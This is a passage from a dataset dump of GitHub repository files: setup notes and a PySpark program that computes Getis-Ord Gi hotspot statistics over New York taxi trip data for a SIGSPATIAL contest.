}\n};\n\ntypedef Array2<double> Array2d;\ntypedef Array2<float> Array2f;\ntypedef Array2<int> Array2i;\n"
}
] | 30 |
moyutianque/SIGSPATIAL-20016 | https://github.com/moyutianque/SIGSPATIAL-20016 | 7b92521d2fa0843050834dde57fb21bc1ef16552 | 60d33b8c2e173e49848fc43fcaced075bf4b0647 | 88bb54ff24a1aa15bff2a77b4fe5378d2d783fec | refs/heads/master | 2018-02-10T13:40:31.731409 | 2017-03-06T13:01:55 | 2017-03-06T13:01:55 | 60,661,145 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.5916230082511902,
"alphanum_fraction": 0.7696335315704346,
"avg_line_length": 26.285715103149414,
"blob_id": "bdd848ab60c49f3c80f5ecb7e64087912578dbd5",
"content_id": "972e40f287981f91e33d3b8150b4d0a73881778f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 191,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 7,
"path": "/referenceCommand.md",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "1. ssh operation:\n\n[click here](http://www.cnblogs.com/jiangyao/archive/2011/01/26/1945570.html)\n\n2. hdfs operation:\n\n[click here](https://segmentfault.com/a/1190000002672666#articleHeader4)\n"
},
{
"alpha_fraction": 0.7675438523292542,
"alphanum_fraction": 0.7850877046585083,
"avg_line_length": 44.599998474121094,
"blob_id": "4c6d475733f9a6f902220df996580888f070de77",
"content_id": "8c06ad2ea0c2fdde8d8a3c37e9d37ba87c2f7464",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 228,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 5,
"path": "/README.md",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "#About install spark in Windows 10 in pycharm\n\nAfter setup the spark, go to the $SPARK_HOME/python and copy the `pyspark` folder into the Python27/lib/site-packages\n\nThen restart the Pycharm, the spark can be use in pycharm now\n"
},
{
"alpha_fraction": 0.5936794877052307,
"alphanum_fraction": 0.7449209690093994,
"avg_line_length": 62.28571319580078,
"blob_id": "05a0dbf8222c735b7c71db2bbb440e0e74e1514c",
"content_id": "4b9f4be08f74562e0cc459ef4b8af28928eae774",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 443,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 7,
"path": "/redecideWork/README.md",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "1. In local machine: use the following example command\n\n> spark-submit --master local[*] --executor-memory 6g program.py '/home/summer/Desktop/secondEDI/source/*.csv' 'result0909/result090901.csv' 0.002 0.08\n\n2. In HPC: use the following example command\n\n> spark-submit --master spark://10.119.176.10:7077 --total-executor-cores 15 --executor-memory 50g program0907.py 'hdfs://10.119.176.10:9000/test/source/*.csv' 'result0909.csv' 0.002 0.08\n"
},
{
"alpha_fraction": 0.7561728358268738,
"alphanum_fraction": 0.7808641791343689,
"avg_line_length": 63.79999923706055,
"blob_id": "1ef4cf9d58bba9467998c877b1e1ac6ddf2c485b",
"content_id": "4bcb764091ec36ccd9e0ec9af81e0c27de8e8a8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 5,
"path": "/concept.md",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "1. iterables generators and yield in python:\n [link](http://stackoverflow.com/questions/231767/what-does-the-yield-keyword-do-in-python)\n\n2. find partitions in spark UI: \n [link](https://databricks.gitbooks.io/databricks-spark-knowledge-base/content/performance_optimization/how_many_partitions_does_an_rdd_have.html)\n"
},
{
"alpha_fraction": 0.7979002594947815,
"alphanum_fraction": 0.8267716765403748,
"avg_line_length": 41.33333206176758,
"blob_id": "e2b693fd6eda768095bc43770fc3a19dca9e6a11",
"content_id": "455a172e8c725a481b06ddf3669aa91e7229436a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 575,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 9,
"path": "/Error.md",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "1. learn to understand spark UI\n\n [Spark UI](https://databricks.com/blog/2015/06/22/understanding-your-spark-application-through-visualization.html)\n\n2. 在main函数以外声明两个全局变量,一个字典类型,一个二维list,字典可以在main里面直接print,而list甚至普通变量在print时会报错,。\n>'java.net.SocketException: Connection reset by peer: socket write error'\n\n\n3. 对于多个rounds的spark程序,只有循环用的global变量会同时变化,其余与该变量相关的全局变量不受影响,故尽量使用少的全局变量.\n"
},
{
"alpha_fraction": 0.4573170840740204,
"alphanum_fraction": 0.48745036125183105,
"avg_line_length": 34.79695510864258,
"blob_id": "14c52effecc0f01dd4a98e89cac931229091369a",
"content_id": "25e011047532da31c57b9d3f3f9b7c9aebc958e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14104,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 394,
"path": "/redecideWork/program.py",
"repo_name": "moyutianque/SIGSPATIAL-20016",
"src_encoding": "UTF-8",
"text": "## Spark Application - execute with spark-submit\n#spark-submit --master spark://10.119.176.10:7077 --total-executor-cores 6 program.py\n# spark-submit --executor-memory 6g program.py \"/home/summer/Desktop/secondEDI/source/*.csv\" \"result1110.csv\" 0.001 0.125\n## Imports\nfrom pyspark import SparkConf, SparkContext,StorageLevel\nfrom collections import namedtuple\nfrom StringIO import StringIO\nfrom datetime import datetime\nfrom operator import add\nfrom math import *\nimport csv\nimport time\nimport os\nimport copy\nfrom heapq import *\nimport sys\n\n## Module Constants\nBlockSize = 8\nexpand = 18\navr_x = 6.67\nINFI = -1000\nstandardDEV = sqrt(196.67)\n\nAPP_NAME = \"My Spark Application\"\nDATE_FMT = \"%Y-%m-%d %H:%M:%S\"\nfields = ('VendorID', 'tpep_pickup_datetime', 'tpep_dropoff_datetime', 'passenger_count', 'trip_distance', \n 'pickup_longitude','pickup_latitude', 'RateCodeID', 'store_and_fwd_flag', 'dropoff_longitude', \n 'dropoff_latitude','payment_type','fare_amount','extra','mta_tax','tip_amount','tolls_amount',\n 'improvement_surcharge','total_amount')\nTaxi = namedtuple('Taxi', fields)\n\n# input items\nPathToInput = sys.argv[1]\nPathToOutput = sys.argv[2]\ncell_size_std = float(sys.argv[3])\nTime_step_std = int(float(sys.argv[4]) * 24)\n\n## File process functions\ndef split(line):\n \"\"\"\n Operator function for splitting a line with csv module\n \"\"\"\n reader = csv.reader(StringIO(line))\n return reader.next()\n\ndef parse(row):\n \"\"\"\n Parses a row and returns a named tuple.\n \"\"\"\n row[0] = int(row[0],0)\n row[1] = datetime.strptime(row[1], DATE_FMT)\n row[2] = datetime.strptime(row[2], DATE_FMT)\n row[3] = int(row[3],0)\n row[4] = float(row[4])\n row[5] = float(row[5])\n row[6] = float(row[6])\n row[7] = int(row[7],0)\n row[9] = float(row[9])\n row[10] = float(row[10])\n row[11] = float(row[11])\n row[12] = float(row[12])\n row[13] = float(row[13])\n row[14] = float(row[14])\n row[15] = float(row[15])\n row[16] = float(row[16])\n row[17] = float(row[17])\n row[18] = float(row[18])\n return Taxi(*row[:19])\n\n## Format change functions\nOriTime = datetime(2009,1,1,0,0,0)\ndef standarizeTime(line):\n cell_x = round((abs(line.pickup_longitude)-0.0)/cell_size_std) \n cell_y = round((line.pickup_latitude-0.0)/cell_size_std)\n TimeDiff = line.tpep_pickup_datetime - OriTime\n cell_z = (TimeDiff.days*24*3600+TimeDiff.seconds)/round(Time_step_std*3600)\n\n cell_x1 = round((abs(line.dropoff_longitude)-0.0)/cell_size_std)\n cell_y1 = round((line.dropoff_latitude-0.0)/cell_size_std)\n TimeDiff2 = line.tpep_dropoff_datetime - OriTime\n cell_z1 = (TimeDiff2.days*24*3600+TimeDiff2.seconds)/round(Time_step_std*3600)\n\n return (((int(cell_x),int(cell_y),int(cell_z)),1),((int(cell_x1),int(cell_y1),int(cell_z1)),1))\n\ndef TransKey(f):\n newList = []\n x=f[0][0]\n y=f[0][1]\n z=f[0][2]\n w=f[1]\n\n kx = x-x%BlockSize\n ky = y-y%BlockSize\n kz = z-z%BlockSize\n\n if x%BlockSize < expand or x%BlockSize >= (BlockSize-expand)\\\n or y%BlockSize < expand or y%BlockSize >= (BlockSize-expand)\\\n or z%BlockSize < expand or z%BlockSize >= (BlockSize-expand):\n #key changes\n kx_upper = (x+expand)-(x+expand)%BlockSize\n kx_lower = (x-expand)-(x-expand)%BlockSize\n ky_upper = (y+expand)-(y+expand)%BlockSize\n ky_lower = (y-expand)-(y-expand)%BlockSize\n kz_upper = (z+expand)-(z+expand)%BlockSize\n kz_lower = (z-expand)-(z-expand)%BlockSize\n\n i=kx_lower\n while i<=kx_upper:\n j=ky_lower\n while j<=ky_upper:\n k=kz_lower\n while k<=kz_upper:\n newList.append(((i,j,k),(x,y,z,w)))\n k+=BlockSize\n j+=BlockSize\n i+=BlockSize\n else:\n newList.append(((kx,ky,kz),(x,y,z,w)))\n \n return newList\n\ndef MakeBlock(Block):\n newBlock = [[[0 for z in range(BlockSize+expand*2)] for y in range(BlockSize+expand*2)] for x in range(BlockSize+expand*2)]\n ## change type of x and y and z in key\n standx = Block[0][0] - expand\n standy = Block[0][1] - expand\n standz = Block[0][2] - expand\n \n for cell in Block[1]:\n newBlock[cell[0]-standx][cell[1]-standy][cell[2]-standz] = cell[3]\n \n return (Block[0],newBlock)\n\n## Definition function\ndef Weight(distance):\n w = 1/(distance+1)\n return w\n\ndef Take50th(Block):\n sortHeap = []\n count = 0\n i = 0\n while i<BlockSize:\n j = 0\n while j<BlockSize:\n k = 0\n while k<BlockSize:\n if count < 50:\n heappush(sortHeap,(Block[1][i][j][k][0],i,j,k))\n count += 1\n else:\n if sortHeap[0][0] < Block[1][i][j][k][0]:\n heapreplace(sortHeap,(Block[1][i][j][k][0],i,j,k))\n k+=1\n j+=1\n i+=1\n The50th = sortHeap[0][0]\n return (Block[0],The50th,sortHeap)\n\ndef GenerateFormat(l):\n resultList = []\n # format of cell ((kx,ky,kz),(w,x,y,z))\n for cell in l:\n resultcell = (cell[0][0]+cell[1][1],cell[0][1]+cell[1][2],\n cell[0][2]+cell[1][3],cell[1][0])\n print resultcell\n resultList.append(resultcell)\n return resultList\n\n## Gi function\ndef Gi(Block):\n GiBlock = [[[0 for z in range(BlockSize)] for y in range(BlockSize)] for x in range(BlockSize)]\n boundary=50\n valuedElements = 0\n i = expand\n while i<BlockSize+expand:\n j = expand\n while j<BlockSize+expand:\n k = expand\n while k<BlockSize+expand:\n if Block[1][i][j][k]!=0:\n valuedElements+=1\n if valuedElements>boundary:\n break\n k+=1\n j+=1\n i+=1\n\n if valuedElements<boundary:\n return (Block[0],False)\n else:\n i = expand\n while i<BlockSize+expand:\n j = expand\n while j<BlockSize+expand:\n k = expand\n while k<BlockSize+expand:\n # Do not calculate Gi of cell with attr == 0\n attr = Block[1][i][j][k]\n if attr==0:\n GiBlock[i-expand][j-expand][k-expand] = (INFI,0)\n else:\n NumofCells = 0\n item1 = 0.0\n item2 = 0.0\n item3 = 0.0\n item4 = 0.0\n result = 0.0\n\n l = i-expand\n while l<=i+expand:\n m = j-expand\n while m<=j+expand:\n n = k-expand\n while n<=k+expand:\n attr = Block[1][l][m][n]\n pow_x = (l-i)**2\n pow_y = (m-j)**2\n pow_z = (n-k)**2\n distance = sqrt(pow_x+pow_y+pow_z)\n if attr!=0 and distance<=expand:\n NumofCells+=1\n weight = Weight(distance)\n item1 += weight * attr\n item2 += weight\n item3 += weight**2\n n+=1\n m+=1\n l+=1\n item4 = item2**2\n if NumofCells==1 or NumofCells*item3-item4<=0:\n result = 0.0\n else:\n result = (item1-avr_x*item2)/(standardDEV*sqrt((NumofCells*item3-item4)/(NumofCells-1)))\n GiBlock[i-expand][j-expand][k-expand] = (result,NumofCells,item1,item2,item3)\n\n k+=1\n j+=1\n i+=1\n return (Block[0],GiBlock)\n\ndef updateGi(Block):\n GiBlock = Block[1][0]\n XBlock = Block[1][1]\n\n i = 0\n while i<BlockSize:\n j = 0\n while j<BlockSize:\n k = 0\n while k<BlockSize:\n #attr = XBlock[i+expand][j+expand][k+expand]\n #if attr == 0:\n #GiBlock[i][j][k]=(INFI,0)\n \n if GiBlock[i][j][k][0] == INFI:\n k+=1\n continue\n \n else:\n NumofCells = GiBlock[i][j][k][1]\n item1 = GiBlock[i][j][k][2]\n item2 = GiBlock[i][j][k][3]\n item3 = GiBlock[i][j][k][4]\n result = GiBlock[i][j][k][0]\n Bx = i+expand\n By = j+expand\n Bz = k+expand\n \n l = Bx-expand\n while l<=Bx+expand:\n m = By-expand\n while m<=By+expand:\n n = Bz-expand\n while n<=Bz+expand:\n #begin\n \"\"\"\n if l == Bx-expand or l == Bx+expand\\\n or m == By-expand or m == By+expand\\\n or n == Bz-expand or n == Bz+expand:\n \"\"\"\n #s\n attr = XBlock[l][m][n]\n pow_x = (l-Bx)**2\n pow_y = (m-By)**2\n pow_z = (n-Bz)**2\n distance = sqrt(pow_x+pow_y+pow_z)\n if attr != 0 and distance <= expand and distance>(expand-1):\n NumofCells+=1\n weight = Weight(distance)\n item1 += weight * attr\n item2 += weight\n item3 += weight**2\n #end\n n+=1\n m+=1\n l+=1\n\n item4 = item2**2\n if NumofCells > GiBlock[i][j][k][1] and NumofCells*item3-item4>0:\n result = (item1-avr_x*item2)/(standardDEV*sqrt((NumofCells*item3-item4)/(NumofCells-1)))\n GiBlock[i][j][k] = (result,NumofCells,item1,item2,item3)\n k+=1\n j+=1\n i+=1\n return (Block[0],GiBlock)\n \n\n\n## Main function\ndef main(sc):\n ## Remove the first line and the unuseable data of csv\n OriginalRDD = sc.textFile(PathToInput).map(split)\n \n header = OriginalRDD.first()\n def ReduceUnusable(row):\n return row != header and \\\n row[5]!=0 and float(row[5])>-74.25 and float(row[5])<-73.7\\\n and float(row[6])!=0 and float(row[6])>40.5 and float(row[6])<40.9\\\n and row[9]!=0 and float(row[9])>-74.25 and float(row[9])<-73.7\\\n and float(row[10])!=0 and float(row[10])>40.5 and float(row[10])<40.9\n SourceRDD = OriginalRDD.filter(ReduceUnusable).map(parse)\\\n .map(standarizeTime).flatMap(lambda x:x).reduceByKey(add)\\\n .persist(StorageLevel.MEMORY_AND_DISK)\n\n ## Make blocks\n BlockRDD = SourceRDD.map(TransKey).flatMap(lambda x:x).groupByKey()\\\n .mapValues(list).map(MakeBlock)\n \n ## Calculate Gi\n GiRDD = BlockRDD.map(Gi).filter(lambda x:x[1]!=False).persist(StorageLevel.MEMORY_AND_DISK)\n\n FirstRoundSortRDD = GiRDD.map(Take50th).persist(StorageLevel.MEMORY_AND_DISK)\n Standard50th = FirstRoundSortRDD.map(lambda f:f[1]).sortBy(lambda f:f,False).take(1)\n Bstandard50th = sc.broadcast(Standard50th)\n \n def SecondRoundSort(HeapRDD):\n index = 0\n for cell in HeapRDD[2]:\n if cell[0] >= Bstandard50th.value[0]:\n break\n index += 1\n return (HeapRDD[0],HeapRDD[2][index:])\n SecondRoundSortRDD = FirstRoundSortRDD.map(SecondRoundSort)\\\n .filter(lambda f:f[1]!=[]).flatMapValues(lambda x:x)\\\n .sortBy(lambda x:x[1][0],False).take(50)\n \n global expand\n print \"-------------%d\"%(expand)\n ResultList = GenerateFormat(SecondRoundSortRDD)\n writeFileName = PathToOutput\n with open(writeFileName,mode='a') as wf:\n writer = csv.writer(wf)\n writer.writerow('expand%d'%(expand))\n for r in ResultList:\n writer.writerow(r)\n wf.close()\n\n while expand<=20:\n #begin\n expand += 1 \n BlockRDD = SourceRDD.map(TransKey).flatMap(lambda x:x).groupByKey()\\\n .mapValues(list).map(MakeBlock)\n \n GiRDD = GiRDD.join(BlockRDD).map(updateGi).persist(StorageLevel.MEMORY_AND_DISK)\n\n FirstRoundSortRDD = GiRDD.map(Take50th).persist(StorageLevel.MEMORY_AND_DISK)\n Standard50th = FirstRoundSortRDD.map(lambda f:f[1]).sortBy(lambda f:f,False).take(1)\n Bstandard50th = sc.broadcast(Standard50th)\n SecondRoundSortRDD = FirstRoundSortRDD.map(SecondRoundSort)\\\n .filter(lambda f:f[1] != []).flatMapValues(lambda x:x)\\\n .sortBy(lambda x:x[1][0],False).take(50)\n \n print \"-------------%d\"%(expand)\n ResultList = GenerateFormat(SecondRoundSortRDD)\n with open(writeFileName,mode='a') as wf:\n writer = csv.writer(wf)\n writer.writerow('expand%d'%(expand))\n for r in ResultList:\n writer.writerow(r)\n wf.close()\n #end\n\nif __name__ == \"__main__\":\n # Configure Spark\n conf = SparkConf().setAppName(APP_NAME)\n #conf = conf.setMaster(\"local[*]\")\n sc = SparkContext(conf=conf)\n \n # Execute Main functionality\n main(sc)\n\nraw_input(\"end...............\")\n"
}
] | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.